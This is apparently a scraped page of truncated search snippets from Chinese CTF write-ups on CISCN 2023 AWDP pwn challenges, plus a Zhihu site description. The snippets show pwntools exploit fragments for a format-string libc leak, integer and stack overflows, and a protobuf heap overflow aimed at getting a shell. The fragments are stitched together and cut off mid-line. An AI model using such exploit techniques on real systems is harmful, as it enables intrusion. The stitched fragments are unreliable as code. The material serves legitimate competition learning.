exp from pwn import * context.log_level='debug' r=process('./pwn') elf=ELF('./pwn') libc=elf.libc def shell(payload): r.sendlineafter("$ \x1B[0m",payload) # gdb.attach(r) shell("echo %29$p a") libc_base=int(r.recv(14),16)-243-libc.sym['__libc_start_main'] print(...
# python3 exp.py AWD 1.1.1.1 PORT IP = str(sys.argv[1]) PORT = int(sys.argv[2]) return remote(IP,PORT) else: return process([binary] + argv, *a, **kw) binary = './pwn' libelf = '' if (binary!=''): elf = ELF(binary)...
最后执行exit("/bin/sh");就能get shell AWD 程序分析 在main函数中有一个跳转,看一下off_5060位置 可以看到我们输入的shell命令不同,会跳转到不同函数,这跟初赛的shellwego类似。 漏洞点位于echo里的格式化字符串漏洞 由于该shell是循环输入,所以可以循环利用这个格式化字符串漏洞泄露libc和stack,然后劫持libc_star...
awdp-pwn/prompt break protobuf,堆溢出漏洞 syntax ="proto3"; packagemypackage; message pwn2 { int32option=1; int32chunk_sizes=2; int32heap_chunks_id=3; bytesheap_content=4; } // protoc --python_out=. pwn2.proto ◆exp frompwnimport* #fr...
ciscn_2023华中赛区 线上 烧烤摊儿 漏洞有两个 1、整数溢出 2、溢出 在啤酒函数和烤串中都有整数溢出 只要输入一个足够大的负数 就可以进入vip函数,将own赋值为1 然后进入gaiming函数,因为scanf的函数的参数是%s所以存在栈溢出 在经过j_strcpy_ifunc函数后向bss段赋值一段数据...
README 本次决赛AWDP 共 4道 pwn题, 整体除了 PHP看不懂,其他的都能 fix 和 break ,比赛时间还是挺久的,但是做着做着就时间就所剩无几了,最后CHR 也没能break。 awdp 第13名,最终总排名 32 名,无缘一等奖,…
elifargs.AWD: # python3 exp.py AWD 1.1.1.1 PORT IP=str(sys.argv[1]) PORT=int(sys.argv[2]) returnremote(IP,PORT) else: returnprocess([binary]+argv,*a,**kw) binary='./pwn' libelf='' if(binary!=''): elf=ELF(binary) ; rop=ROP(binary);libc=elf.libc ...
本次决赛AWDP 共 4道 pwn题, 整体除了 PHP看不懂,其他的都能 fix 和 break ,比赛时间还是挺久的,但是做着做着就时间就所剩无几了,最后CHR 也没能break(自己太垃圾了)awdp 第13名,最终总排名 32 名 无缘一等奖,和前面的队伍就差几分,如果再开个渗透题也就一了,奈何我太菜了呜呜呜爆0了,靠队友带...
知乎,中文互联网高质量的问答社区和创作者聚集的原创内容平台,于 2011 年 1 月正式上线,以「让人们更好的分享知识、经验和见解,找到自己的解答」为品牌使命。知乎凭借认真、专业、友善的社区氛围、独特的产品机制以及结构化和易获得的优质内容,聚集了中文互联网科技、